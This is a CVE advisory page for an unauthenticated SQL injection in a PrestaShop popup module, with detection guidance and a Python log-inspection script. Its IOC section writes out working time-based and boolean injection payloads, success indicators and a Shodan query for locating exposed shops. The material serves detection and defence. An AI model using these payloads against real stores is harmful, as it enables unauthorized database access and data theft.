CVE-2023-27032
published 2023-04-12

CVE-2023-27032: Prestashop advancedpopupcreator v1.1.21 to v1.1.24 was discovered to contain a SQL injection vulnerability via the component AdvancedPopup::getPopups().

Priority P276, critical, 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 3.04% (85.9th percentile)

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| idnovate | popup_module_and_newsletter | >= 1.1.21 < 1.1.25 | 1.1.25 |

Detection & IOCs (extracted from sources)

url: /module/advancedpopupcreator/popup
command: availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
command: fromController=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&id_category=0&id_cms=1&id_manufacturer=0&id_product=0&id_supplier=0&referrer=1&responsiveWidth=1280&time={{time}}&token={{token}}&updateVisits=1&url=https%253A%252F%252F{{Hostname}}%252F
command: availablePopups=-8514)%20OR%206158%3d6158--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
command: availablePopups=-8514)%20OR%206158%3d6157--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
  • Monitor POST requests to /module/advancedpopupcreator/popup for SQL injection payloads in the `availablePopups` and `fromController` parameters, particularly time-based sleep() injections and boolean-based OR conditions.
  • Time-based SQLi detection: response duration >= 6 seconds combined with HTTP 200 and body containing 'hasError' indicates successful sleep() injection via `availablePopups` or `fromController` parameters.
  • Blind boolean-based SQLi detection: a response containing 'selector' for the true condition payload (`-8514) OR 6158=6158`) and absence of 'selector' for the false condition payload (`-8514) OR 6158=6157`) confirms exploitation.
  • Shodan fingerprinting query for exposed PrestaShop instances potentially running the vulnerable module: http.component:"prestashop"
  • The vulnerable code path is AdvancedPopup::getPopups() — look for unsanitized input flowing into SQL queries from that method in module source code audits.
  • Affected versions are advancedpopupcreator v1.1.21 through v1.1.24; presence of these versions on a PrestaShop instance should be treated as a high-priority finding.
  • Exploitation requires no authentication: the SQL injection endpoint /module/advancedpopupcreator/popup is accessible to unauthenticated guests, maximising exposure.
  • The Nuclei template uses a two-stage flow: first extracting a `time` value and `static_token` from the homepage (GET /), then injecting into the popup endpoint. Detection rules must account for this token-extraction pre-step when replaying or blocking.
  • The template covers both time-based (sleep(6)) and blind boolean-based injection techniques; WAF/IDS rules should cover both variants to avoid partial detection gaps.
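
One way to apply the monitoring guidance above to parsed request/response records, covering both the time-based and boolean-based variants (an added example, not code from the module, the Nuclei template or this page's sources). The record fields, the `inspect_request` function and the allowlist patterns for benign parameter values are assumptions.

```python
import re
from urllib.parse import parse_qs

ENDPOINT = "/module/advancedpopupcreator/popup"
# Assumption (not taken from the module source): benign values are a
# comma-separated list of integers for availablePopups and a plain controller
# name for fromController, as in the page's sample "fromController=product".
ALLOWED = {
    "availablePopups": re.compile(r"\d+(,\d+)*"),
    "fromController": re.compile(r"[A-Za-z0-9_]+"),
}
SLEEP = re.compile(r"\bsleep\s*\(", re.I)
BOOLEAN = re.compile(r"\bOR\s+\d+\s*=\s*\d+", re.I)

def inspect_request(rec):
    """Return a list of findings for one request/response record."""
    if rec["method"] != "POST" or rec["path"].split("?")[0] != ENDPOINT:
        return []
    findings = []
    params = parse_qs(rec["body"])  # URL-decodes %2C, %20, %3d before matching
    for name, pattern in ALLOWED.items():
        for value in params.get(name, []):
            if pattern.fullmatch(value):
                continue
            kind = ("time-based" if SLEEP.search(value)
                    else "boolean-based" if BOOLEAN.search(value)
                    else "unexpected-value")
            findings.append(f"{name}:{kind}")
    # Success indicator listed on this page: >= 6 s, HTTP 200, body has 'hasError'.
    if (any(f.endswith("time-based") for f in findings) and rec["duration_s"] >= 6
            and rec["status"] == 200 and "hasError" in rec["resp"]):
        findings.append("sleep-executed")
    return findings

# Constructed sample records (not real traffic); bodies shortened from the page's entries.
SAMPLES = [
    {"method": "POST", "path": ENDPOINT, "status": 200, "duration_s": 0.2, "resp": "{}",
     "body": "availablePopups=3,7&event=1&fromController=product&getPopup=1"},
    {"method": "POST", "path": ENDPOINT, "status": 200, "duration_s": 6.3, "resp": '{"hasError":true}',
     "body": "availablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product"},
    {"method": "POST", "path": ENDPOINT, "status": 200, "duration_s": 0.3, "resp": "selector",
     "body": "availablePopups=-8514)%20OR%206158%3d6158--%20eKWg&event=1&fromController=product"},
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(inspect_request(rec))
```

Because the allowlist rejects anything that is not a plain value, inputs that match neither signature are still reported as `unexpected-value` rather than passing silently.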

CVSS provenance

nvd: v3.1, 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck: 9.8 CRITICAL